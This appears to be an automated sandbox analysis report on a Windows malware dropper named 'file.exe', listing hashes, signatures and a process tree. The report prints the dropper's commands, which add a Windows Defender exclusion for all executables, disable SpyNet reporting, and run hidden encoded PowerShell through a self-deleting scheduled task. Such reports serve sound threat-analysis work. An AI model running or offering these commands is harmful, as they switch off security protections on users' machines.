Analysis
-
max time kernel
199s -
max time network
204s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
23-11-2022 09:13
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20221111-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
83cce075792f5914f1e2bc7004294e13
-
SHA1
5cb68663c79a606e92bfdca2cbaa559cafb27902
-
SHA256
b6bc391c17a37a17d2be2bcbdfc712602c216af7c2dd5d320f94be5bbc16d7a6
-
SHA512
c3d0b81a4234a98b264ea95a0453d2ff85c1e28e4cb3d43f4b12bc88b4091091c78d955eb94621a3605c0c5a19ea5f540aa4749906539e340e281161358d546f
-
SSDEEP
196608:91ONTzh25zDhTac+XYtC/xUl9q4fZUpmsN0KLJ2:3OXo4otC/g9q4hUpRV2
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
Processes:
Install.exeInstall.exepid process 1276 Install.exe 4016 Install.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Install.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation Install.exe -
Drops file in System32 directory 1 IoCs
Processes:
Install.exedescription ioc process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
Install.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.EXEpid process 2264 powershell.EXE 2264 powershell.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.EXEdescription pid process Token: SeDebugPrivilege 2264 powershell.EXE -
Suspicious use of WriteProcessMemory 41 IoCs
Processes:
file.exeInstall.exeInstall.exeforfiles.exeforfiles.execmd.execmd.exepowershell.EXEdescription pid process target process PID 964 wrote to memory of 1276 964 file.exe Install.exe PID 964 wrote to memory of 1276 964 file.exe Install.exe PID 964 wrote to memory of 1276 964 file.exe Install.exe PID 1276 wrote to memory of 4016 1276 Install.exe Install.exe PID 1276 wrote to memory of 4016 1276 Install.exe Install.exe PID 1276 wrote to memory of 4016 1276 Install.exe Install.exe PID 4016 wrote to memory of 4480 4016 Install.exe forfiles.exe PID 4016 wrote to memory of 4480 4016 Install.exe forfiles.exe PID 4016 wrote to memory of 4480 4016 Install.exe forfiles.exe PID 4016 wrote to memory of 1032 4016 Install.exe forfiles.exe PID 4016 wrote to memory of 1032 4016 Install.exe forfiles.exe PID 4016 wrote to memory of 1032 4016 Install.exe forfiles.exe PID 4480 wrote to memory of 4100 4480 forfiles.exe cmd.exe PID 4480 wrote to memory of 4100 4480 forfiles.exe cmd.exe PID 4480 wrote to memory of 4100 4480 forfiles.exe cmd.exe PID 1032 wrote to memory of 3944 1032 forfiles.exe cmd.exe PID 1032 wrote to memory of 3944 1032 forfiles.exe cmd.exe PID 1032 wrote to memory of 3944 1032 forfiles.exe cmd.exe PID 4100 wrote to memory of 4328 4100 cmd.exe reg.exe PID 4100 wrote to memory of 4328 4100 cmd.exe reg.exe PID 4100 wrote to memory of 4328 4100 cmd.exe reg.exe PID 3944 wrote to memory of 64 3944 cmd.exe reg.exe PID 3944 wrote to memory of 64 3944 cmd.exe reg.exe PID 3944 wrote to memory of 64 3944 cmd.exe reg.exe PID 4100 wrote to memory of 3136 4100 cmd.exe reg.exe PID 4100 wrote to memory of 3136 4100 cmd.exe reg.exe PID 4100 wrote to memory of 3136 4100 cmd.exe reg.exe PID 3944 wrote to memory of 1304 3944 cmd.exe reg.exe PID 3944 wrote to memory of 1304 3944 cmd.exe reg.exe PID 3944 wrote to memory of 1304 3944 cmd.exe reg.exe PID 4016 wrote to memory of 3196 4016 Install.exe schtasks.exe PID 4016 wrote to memory of 3196 4016 Install.exe schtasks.exe PID 4016 wrote to memory of 3196 4016 Install.exe schtasks.exe PID 4016 wrote to memory of 952 4016 Install.exe schtasks.exe PID 4016 wrote to memory of 952 4016 Install.exe schtasks.exe PID 4016 wrote to memory of 952 4016 Install.exe schtasks.exe PID 2264 wrote to memory of 4496 2264 powershell.EXE gpupdate.exe PID 2264 wrote to memory of 4496 2264 powershell.EXE gpupdate.exe PID 4016 wrote to memory of 4500 4016 Install.exe schtasks.exe PID 4016 wrote to memory of 4500 4016 Install.exe schtasks.exe PID 4016 wrote to memory of 4500 4016 Install.exe schtasks.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS58FD.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS6198.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gZqTuqZWf" /SC once /ST 04:37:28 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gZqTuqZWf"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gZqTuqZWf"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\7zS58FD.tmp\Install.exeFilesize
6.3MB
MD5a35b660762a0c207183dbd2f78012296
SHA1abd3ff7c687ce038929d427f346ab007c13ee1c0
SHA256babae7c45ab45def5cc67a09ca46fa300776216899200a91b5117da9407b239f
SHA51292800c274f6793be68f90dacc1b2b4fcd24fdb3bcbc0862aa8330001a025ec69ca992625b16dacee730979dc33f933dc90427301499e3333ac751c0ad9debdde
-
C:\Users\Admin\AppData\Local\Temp\7zS58FD.tmp\Install.exeFilesize
6.3MB
MD5a35b660762a0c207183dbd2f78012296
SHA1abd3ff7c687ce038929d427f346ab007c13ee1c0
SHA256babae7c45ab45def5cc67a09ca46fa300776216899200a91b5117da9407b239f
SHA51292800c274f6793be68f90dacc1b2b4fcd24fdb3bcbc0862aa8330001a025ec69ca992625b16dacee730979dc33f933dc90427301499e3333ac751c0ad9debdde
-
C:\Users\Admin\AppData\Local\Temp\7zS6198.tmp\Install.exeFilesize
6.8MB
MD5a37dbf6bceec57a1792cefc8691b4930
SHA197a2fd7ba3ff1b231a9f123c5f1e297a6ac7e063
SHA256edbb320e9e508bfd12f21fd8debe60c1f9b365135fb21d8a6fc767a1a4822efa
SHA512b6d9a058d336a760c72c51e856d02d5641c412acb4f86e8c9da610256bb39910df300d440c07cbca4bb953e939155e0ad9a494eb667c87d2a45d783dfa498d77
-
C:\Users\Admin\AppData\Local\Temp\7zS6198.tmp\Install.exeFilesize
6.8MB
MD5a37dbf6bceec57a1792cefc8691b4930
SHA197a2fd7ba3ff1b231a9f123c5f1e297a6ac7e063
SHA256edbb320e9e508bfd12f21fd8debe60c1f9b365135fb21d8a6fc767a1a4822efa
SHA512b6d9a058d336a760c72c51e856d02d5641c412acb4f86e8c9da610256bb39910df300d440c07cbca4bb953e939155e0ad9a494eb667c87d2a45d783dfa498d77
-
memory/64-146-0x0000000000000000-mapping.dmp
-
memory/952-150-0x0000000000000000-mapping.dmp
-
memory/1032-142-0x0000000000000000-mapping.dmp
-
memory/1276-132-0x0000000000000000-mapping.dmp
-
memory/1304-148-0x0000000000000000-mapping.dmp
-
memory/2264-154-0x00007FFA60C80000-0x00007FFA61741000-memory.dmpFilesize
10.8MB
-
memory/2264-151-0x00007FFA60C80000-0x00007FFA61741000-memory.dmpFilesize
10.8MB
-
memory/2264-152-0x000002095FE00000-0x000002095FE22000-memory.dmpFilesize
136KB
-
memory/3136-147-0x0000000000000000-mapping.dmp
-
memory/3196-149-0x0000000000000000-mapping.dmp
-
memory/3944-144-0x0000000000000000-mapping.dmp
-
memory/4016-138-0x0000000010000000-0x0000000010D2B000-memory.dmpFilesize
13.2MB
-
memory/4016-135-0x0000000000000000-mapping.dmp
-
memory/4100-143-0x0000000000000000-mapping.dmp
-
memory/4328-145-0x0000000000000000-mapping.dmp
-
memory/4480-141-0x0000000000000000-mapping.dmp
-
memory/4496-153-0x0000000000000000-mapping.dmp
-
memory/4500-155-0x0000000000000000-mapping.dmp